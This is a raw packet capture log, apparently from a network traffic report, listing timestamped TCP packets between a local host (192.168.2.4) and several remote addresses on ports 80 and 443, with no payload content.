                                                                                                                                                                                  Nov 23, 2024 14:46:42.982633114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.983644009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.983697891 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:42.983777046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.984720945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.984770060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:42.984819889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:43.097764015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:43.097799063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:43.097887039 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:43.098189116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:43.098238945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:43.099248886 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:52.876924038 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:52.945741892 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:46:52.945779085 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:52.945861101 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:46:52.946086884 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:46:52.946099997 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:53.734430075 CET49759443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:53.734477997 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:53.734651089 CET49759443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:53.736726999 CET49759443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:53.736759901 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:54.649455070 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:54.649646044 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:46:54.649657011 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:54.651273012 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:54.651351929 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:46:54.652519941 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:46:54.652602911 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:54.697669983 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:46:54.697679996 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:54.744127989 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                  Nov 23, 2024 14:46:55.125823021 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.125885010 CET49759443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:55.129977942 CET49759443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:55.129987955 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.130279064 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.170577049 CET49759443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:55.215333939 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.639429092 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:55.639467001 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.639605045 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:55.639875889 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:55.639890909 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.640764952 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.640825033 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.640904903 CET49759443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:55.644081116 CET49759443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:55.644098043 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.644175053 CET49759443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:55.644181967 CET4434975923.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.752007008 CET49766443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:55.752063990 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.752135992 CET49766443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:55.752559900 CET49766443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:55.752585888 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.930372953 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:55.930417061 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:55.930502892 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:55.930718899 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:55.930733919 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.177664995 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.177751064 CET49766443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:57.179615974 CET49766443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:57.179662943 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.179939985 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.184637070 CET49766443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:57.227375031 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.507709980 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.507942915 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:57.507966995 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.509419918 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.509494066 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:57.511101961 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:57.511188030 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.511560917 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:57.511570930 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.556013107 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:57.657785892 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.657993078 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:57.658020973 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.659473896 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.659533024 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:57.660784960 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:57.660864115 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.661078930 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:57.661087036 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.705626011 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.705688953 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.705763102 CET49766443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:57.706792116 CET49766443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:57.706830025 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.706860065 CET49766443192.168.2.423.218.208.109
                                                                                                                                                                                  Nov 23, 2024 14:46:57.706876993 CET4434976623.218.208.109192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:57.714387894 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017339945 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017400026 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017452002 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017458916 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017504930 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017551899 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017559052 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017570972 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017602921 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.017623901 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149049997 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149080038 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149090052 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149115086 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149135113 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149136066 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149147034 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149161100 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149169922 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149189949 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.149209023 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.213738918 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.213794947 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.213838100 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.213860989 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.213876963 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.214040995 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.241739988 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.241786957 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.241827011 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.241836071 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.241852045 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.241873980 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.330647945 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.330672979 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.330746889 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.330775976 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.330809116 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.330868959 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.385571957 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.385606050 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.385653973 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.385684967 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.385720968 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.386255026 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.397543907 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.397572041 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.397619009 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.397639990 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.397672892 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.397816896 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.418690920 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.418781996 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.418785095 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.419029951 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.419116974 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.419153929 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.419177055 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.419421911 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.428653002 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.428703070 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.428735018 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.428746939 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.428776026 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.428797960 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.446949005 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.446991920 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.447031021 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.447045088 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.447058916 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.447151899 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.466242075 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.466272116 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.466304064 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.466315985 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.466339111 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.466372013 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.566886902 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.566973925 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.567687988 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.567894936 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.567941904 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.606148958 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.606220007 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.606256962 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.606270075 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.606311083 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.606323004 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.622165918 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.622229099 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.622253895 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.622268915 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.622303963 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.622323990 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.638216972 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.638261080 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.638300896 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.638313055 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.638340950 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.638360023 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.652133942 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.652177095 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.652215958 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.652225018 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.652256966 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.652267933 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.668037891 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.668081045 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.668119907 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.668128014 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.668175936 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.670384884 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.670533895 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.670571089 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.670583010 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.670597076 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.769432068 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.769485950 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:58.769557953 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.769925117 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:46:58.769943953 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.611218929 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.611342907 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:00.611808062 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.612200975 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:00.612246990 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.613078117 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:00.613120079 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.613286972 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.613353968 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:00.613554001 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.613620043 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:00.613692999 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.613749027 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:00.622504950 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:00.653121948 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:00.653153896 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.667373896 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:00.699743986 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.094635010 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.147286892 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.148922920 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.148931980 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.148983002 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.149008036 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.149053097 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.149082899 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.149082899 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.149096012 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.149111986 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.149123907 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.149157047 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.342858076 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.342875004 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.342936039 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.342958927 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.342968941 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.342993975 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.343044996 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.343647957 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.401931047 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.401993036 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.402039051 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.402050018 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.402100086 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.402120113 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.428836107 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.428924084 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.428926945 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.429013014 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.429114103 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.429146051 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.441545963 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.441637039 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.441698074 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.441725969 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.441754103 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.441770077 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.441809893 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.634999990 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.635047913 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.635184050 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.635215998 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.635296106 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.678642035 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.678744078 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.678760052 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.678806067 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.678826094 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.678868055 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:01.809194088 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.809287071 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:01.809320927 CET49774443192.168.2.413.107.246.63
